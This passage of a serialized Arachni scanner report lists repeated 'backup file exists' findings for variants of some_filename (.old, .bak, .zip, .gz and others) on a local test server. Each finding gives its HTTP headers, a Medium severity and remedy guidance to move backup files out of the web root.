  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.old
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "17"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.old
    injected: some_filename.old
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.old
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.old
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php.OLD
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "21"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php.OLD
    injected: some_filename.php.OLD
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php.OLD
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php.OLD
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.OLD
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "17"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.OLD
    injected: some_filename.OLD
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.OLD
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.OLD
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php.bak
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "21"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php.bak
    injected: some_filename.php.bak
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php.bak
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php.bak
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.bak
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "17"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.bak
    injected: some_filename.bak
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.bak
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.bak
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php.BAK
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "21"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php.BAK
    injected: some_filename.php.BAK
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php.BAK
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php.BAK
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.BAK
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "17"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.BAK
    injected: some_filename.BAK
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.BAK
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.BAK
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php.zip
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "21"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php.zip
    injected: some_filename.php.zip
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php.zip
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php.zip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.zip
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "17"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.zip
    injected: some_filename.zip
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.zip
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.zip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php.ZIP
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "21"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php.ZIP
    injected: some_filename.php.ZIP
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php.ZIP
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php.ZIP
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.ZIP
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "17"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.ZIP
    injected: some_filename.ZIP
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.ZIP
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.ZIP
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php.gz
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "20"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php.gz
    injected: some_filename.php.gz
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php.gz
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php.gz
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.gz
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "16"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.gz
    injected: some_filename.gz
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.gz
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.gz
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php.tar.gz
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "24"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php.tar.gz
    injected: some_filename.php.tar.gz
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php.tar.gz
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php.tar.gz
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.tar.gz
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "20"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.tar.gz
    injected: some_filename.tar.gz
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.tar.gz
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.tar.gz
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php.temp
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
